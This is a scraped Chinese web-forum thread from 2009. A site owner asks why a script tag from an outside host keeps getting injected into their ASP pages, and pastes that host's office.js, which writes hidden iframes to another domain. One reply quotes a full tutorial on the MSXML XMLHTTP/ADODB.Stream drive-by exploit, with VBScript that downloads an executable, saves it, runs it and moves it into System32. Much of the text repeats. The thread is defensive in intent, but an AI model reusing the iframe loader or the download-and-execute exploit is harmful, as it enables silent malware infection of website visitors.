28,391
社区成员
发帖
与我相关
我的任务
分享网页自动写入木马 是不是程序代码有问题 http://office2.viens.la/office.js?do=list&uid=193&type=blog
各位c友:
我的一个网站,最近几乎每天都在 index.asp conn.asp等页面的页首或者页尾自动加入
“<script language="javascript" src="http://office2.viens.la/office.js?do=list&uid=193&type=blog"></script>”
这行javascript脚本代码,加入之后主页index.asp中有引用的的文件中包括sql语句的内容就
显示不出了。每次用原先的文件替换感染的index.asp等文件,第二天又自动感染,写入上面那行
的javascript脚本。
不知何解。
注:1.网站放在虚拟空间上的,没有都主机的控制权。
2.http://office2.viens.la/office.js?do=list&uid=193&type=blog的路径的 office.js文件内容如下
-----------------------------------------------------------------------
var cookA = new String(document.cookie);
var Then = new Date();
var cookName = '9B4A4C5EBF042C02' ;
Then.setTime(Then.getTime() + 30*60*1000 );
var kesor = cookA.indexOf(cookName);
if (kesor == -1)
{
document.write('<iframe src=http://www.bengchiii.cn/jzll/31.htm width=50 height=0 border=0></iframe>');
document.write('<IFRAME marginWidth=0 marginHeight=0 src="http://count27.51yes.com/sa.aspx?id=275666147&refe='+window.parent.location+'&location=http%3A//office.js/&color=32x&resolution=1024x768&returning=0&language=zh-cn&ua=Mozilla/4.0%20%28compatible%3B%20MSIE%206.0%3B%20Windows%20NT%205.1%3B%20SV1%3B%20.NET%20CLR%202.0.50727%3B%20.NET%20CLR%203.0.04506.30%29" frameBorder=0 width=0 scrolling=no height=0></IFRAME>');
document.cookie = "A1="+ cookName +";expires="+ Then.toGMTString() +";path=/";
}
-------------------------------------------------------------------------
我的一个网站,最近几乎每天都在 index.asp conn.asp等页面的页首或者页尾自动加入
“<script language="javascript" src="http://office2.viens.la/office.js?do=list&uid=193&type=blog"></script>”
这行javascript脚本代码,加入之后主页index.asp中有引用的的文件中包括sql语句的内容就
显示不出了。每次用原先的文件替换感染的index.asp等文件,第二天又自动感染,写入上面那行
的javascript脚本。
不知何解。
注:1.网站放在虚拟空间上的,没有都主机的控制权。
2.http://office2.viens.la/office.js?do=list&uid=193&type=blog的路径的 office.js文件内容如下
-----------------------------------------------------------------------
var cookA = new String(document.cookie);
var Then = new Date();
var cookName = '9B4A4C5EBF042C02' ;
Then.setTime(Then.getTime() + 30*60*1000 );
var kesor = cookA.indexOf(cookName);
if (kesor == -1)
{
document.write('<iframe src=http://www.bengchiii.cn/jzll/31.htm width=50 height=0 border=0></iframe>');
document.write('<IFRAME marginWidth=0 marginHeight=0 src="http://count27.51yes.com/sa.aspx?id=275666147&refe='+window.parent.location+'&location=http%3A//office.js/&color=32x&resolution=1024x768&returning=0&language=zh-cn&ua=Mozilla/4.0%20%28compatible%3B%20MSIE%206.0%3B%20Windows%20NT%205.1%3B%20SV1%3B%20.NET%20CLR%202.0.50727%3B%20.NET%20CLR%203.0.04506.30%29" frameBorder=0 width=0 scrolling=no height=0></IFRAME>');
document.cookie = "A1="+ cookName +";expires="+ Then.toGMTString() +";path=/";
}
-------------------------------------------------------------------------
...全文
请发表友善的回复…
发表回复
yangxu0072002 2009-01-13
- 打赏
- 举报
这个问题到底怎么解决啊?我的网站每天都要清理代码,请高手指点
lu_ing 2009-01-13
- 打赏
- 举报
服务器漏洞 还是 因为感染病毒 只需要杀毒就可以啊
请求高手
解读下 office.js 这个文件 (应该是病毒或者引向病毒)
var cookA = new String(document.cookie);
var Then = new Date();
var cookName = '9B4A4C5EBF042C02' ;
Then.setTime(Then.getTime() + 30*60*1000 );
var kesor = cookA.indexOf(cookName);
if (kesor == -1)
{
document.write(' <iframe src=http://www.bengchiii.cn/jzll/31.htm width=50 height=0 border=0> </iframe>');
document.write(' <IFRAME marginWidth=0 marginHeight=0 src="http://count27.51yes.com/sa.aspx?id=275666147&refe='+window.parent.location+'&location=http%3A//office.js/&color=32x&resolution=1024x768&returning=0&language=zh-cn&ua=Mozilla/4.0%20%28compatible%3B%20MSIE%206.0%3B%20Windows%20NT%205.1%3B%20SV1%3B%20.NET%20CLR%202.0.50727%3B%20.NET%20CLR%203.0.04506.30%29" frameBorder=0 width=0 scrolling=no height=0> </IFRAME>');
document.cookie = "A1="+ cookName +";expires="+ Then.toGMTString() +";path=/";
}
请求高手
解读下 office.js 这个文件 (应该是病毒或者引向病毒)
var cookA = new String(document.cookie);
var Then = new Date();
var cookName = '9B4A4C5EBF042C02' ;
Then.setTime(Then.getTime() + 30*60*1000 );
var kesor = cookA.indexOf(cookName);
if (kesor == -1)
{
document.write(' <iframe src=http://www.bengchiii.cn/jzll/31.htm width=50 height=0 border=0> </iframe>');
document.write(' <IFRAME marginWidth=0 marginHeight=0 src="http://count27.51yes.com/sa.aspx?id=275666147&refe='+window.parent.location+'&location=http%3A//office.js/&color=32x&resolution=1024x768&returning=0&language=zh-cn&ua=Mozilla/4.0%20%28compatible%3B%20MSIE%206.0%3B%20Windows%20NT%205.1%3B%20SV1%3B%20.NET%20CLR%202.0.50727%3B%20.NET%20CLR%203.0.04506.30%29" frameBorder=0 width=0 scrolling=no height=0> </IFRAME>');
document.cookie = "A1="+ cookName +";expires="+ Then.toGMTString() +";path=/";
}
layers2323 2009-01-13
- 打赏
- 举报
基本上觉得是服务器的问题。
7758iloveu 2009-01-13
- 打赏
- 举报
关注,一样的问题,一直没有找到好的解决办法。
哪位高手支个招,谢谢哦!
哪位高手支个招,谢谢哦!
半山闲人 2009-01-13
- 打赏
- 举报
代码无问题,电脑有问题!
lu_ing 2009-01-13
- 打赏
- 举报
访问我的网站时,瑞星可以检测到到下面的漏洞:
-----------------------------------------------------------
访问地址:http://w.c66h.cn/1.htm
访问网页的进程:"C:\Program Files\360safe\360se\360SE.exe"
漏洞对象名:microsoft.xmlhttp
我有去查了microsoft.xmlhttp 这个漏洞发现下面的东西
-----------------------------------------------------------
XMLHTTP漏洞利用
1. 漏洞说明:
Microsoft XML核心服务 XMLHTTP控件代码执行漏洞
受影响系统:
Microsoft XML Core Services 4.0
- Microsoft Windows XP SP2
- Microsoft Windows Server 2003 SP1
- Microsoft Windows Server 2003
- Microsoft Windows 2000 SP4
描述:
Microsoft XML核心服务(MSXML)允许使用JScript、VBScript和Microsoft Visual Studio 6.0的用户构建可与其他符合XML 1.0标准的应用程序相互操作的XML应用。
在Microsoft XML Core Services 4.0的XMLHTTP 4.0 ActiveX控件中,setRequestHeader()函数没有正确地处理HTTP请求,允许攻击者诱骗用户访问恶意的站点导致执行任意指令。
2. 漏洞利用
这个漏洞主要是利用两个对象Microsoft.XMLHTTP和Adodb.Stream。
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
Set oReq = df.CreateObject("Microsoft.XMLHTTP","")
set S = df.CreateObject(="Adodb.Stream","")
S.type = 1
首先建立这两个对象,这是用VBScript 写的。adodb.stream 的type 属性指定需要读取流的的格式 1 是二进制文件, 2是文本文件。
在http://msdn2.microsoft.com/en-us/library/ms535874.aspx 里有对XMLHTTP的详细说明。
在http://msdn2.microsoft.com/en-us/library/ms675532.aspx 里是对ADO操作数据流的说明。
oReq.Open "GET", "http://127.0.0.1/abc.exe", false
oReq.Send
fname1="abc.exe"
set F = df.Createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write oReq.responseBody
S.savetofile fname1,2
S.close
这里就是利用的重点。Open是XMLHTTP的一个方法,第一个参数是指定HTTP的方法,下载嘛,当然是用GET了。第二个参数是需要下载木马的地址,不过你的网页要和木马在通一个服务器上面才行。false是指定异步传输。Send就把上面指定的文件发送到浏览器缓存。
然后用FileSystemObject来设置程序放哪。GetSpecialFolder的参数:0 Windows 文件夹 1 System32 文件夹 2 Temp 文件夹。
open 是用来定位流的,如果没有参数,则默认问当前输入流,也就是浏览器的缓存。write 方法是把缓存中的数据写到adodb 的对象里面。然后调用savetofile 转存到指定文件中。
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
剩下需要做的事情只是把木马程序启动起来就行了。
不过这时的木马程序是放在temp文件夹里面的,这个问题我试过,二进制文件如果放在system32文件夹下会失败,虽然也能下载下来但是无法运行。不过解决的办法也很简单,反正下载一个文件行,再下一个也没什么。只需要写个脚本就能搞定了。
dim fso
set fso=CreateObject("Scripting.FileSystemObject")
fso.MoveFile "C:\Documents and Settings\Administrator\LocalSettings\Temp\abc.exe",
"C:\WINDOWS\System32\"
set wshshell=CreateObject("WScript.Shell")
wshshell.run "abc.exe"
在上面网页的最后执行这个脚本就可以把木马程序移动到System32文件夹下,并运行。
-----------------------------------------------------------
访问地址:http://w.c66h.cn/1.htm
访问网页的进程:"C:\Program Files\360safe\360se\360SE.exe"
漏洞对象名:microsoft.xmlhttp
我有去查了microsoft.xmlhttp 这个漏洞发现下面的东西
-----------------------------------------------------------
XMLHTTP漏洞利用
1. 漏洞说明:
Microsoft XML核心服务 XMLHTTP控件代码执行漏洞
受影响系统:
Microsoft XML Core Services 4.0
- Microsoft Windows XP SP2
- Microsoft Windows Server 2003 SP1
- Microsoft Windows Server 2003
- Microsoft Windows 2000 SP4
描述:
Microsoft XML核心服务(MSXML)允许使用JScript、VBScript和Microsoft Visual Studio 6.0的用户构建可与其他符合XML 1.0标准的应用程序相互操作的XML应用。
在Microsoft XML Core Services 4.0的XMLHTTP 4.0 ActiveX控件中,setRequestHeader()函数没有正确地处理HTTP请求,允许攻击者诱骗用户访问恶意的站点导致执行任意指令。
2. 漏洞利用
这个漏洞主要是利用两个对象Microsoft.XMLHTTP和Adodb.Stream。
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
Set oReq = df.CreateObject("Microsoft.XMLHTTP","")
set S = df.CreateObject(="Adodb.Stream","")
S.type = 1
首先建立这两个对象,这是用VBScript 写的。adodb.stream 的type 属性指定需要读取流的的格式 1 是二进制文件, 2是文本文件。
在http://msdn2.microsoft.com/en-us/library/ms535874.aspx 里有对XMLHTTP的详细说明。
在http://msdn2.microsoft.com/en-us/library/ms675532.aspx 里是对ADO操作数据流的说明。
oReq.Open "GET", "http://127.0.0.1/abc.exe", false
oReq.Send
fname1="abc.exe"
set F = df.Createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write oReq.responseBody
S.savetofile fname1,2
S.close
这里就是利用的重点。Open是XMLHTTP的一个方法,第一个参数是指定HTTP的方法,下载嘛,当然是用GET了。第二个参数是需要下载木马的地址,不过你的网页要和木马在通一个服务器上面才行。false是指定异步传输。Send就把上面指定的文件发送到浏览器缓存。
然后用FileSystemObject来设置程序放哪。GetSpecialFolder的参数:0 Windows 文件夹 1 System32 文件夹 2 Temp 文件夹。
open 是用来定位流的,如果没有参数,则默认问当前输入流,也就是浏览器的缓存。write 方法是把缓存中的数据写到adodb 的对象里面。然后调用savetofile 转存到指定文件中。
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
剩下需要做的事情只是把木马程序启动起来就行了。
不过这时的木马程序是放在temp文件夹里面的,这个问题我试过,二进制文件如果放在system32文件夹下会失败,虽然也能下载下来但是无法运行。不过解决的办法也很简单,反正下载一个文件行,再下一个也没什么。只需要写个脚本就能搞定了。
dim fso
set fso=CreateObject("Scripting.FileSystemObject")
fso.MoveFile "C:\Documents and Settings\Administrator\LocalSettings\Temp\abc.exe",
"C:\WINDOWS\System32\"
set wshshell=CreateObject("WScript.Shell")
wshshell.run "abc.exe"
在上面网页的最后执行这个脚本就可以把木马程序移动到System32文件夹下,并运行。
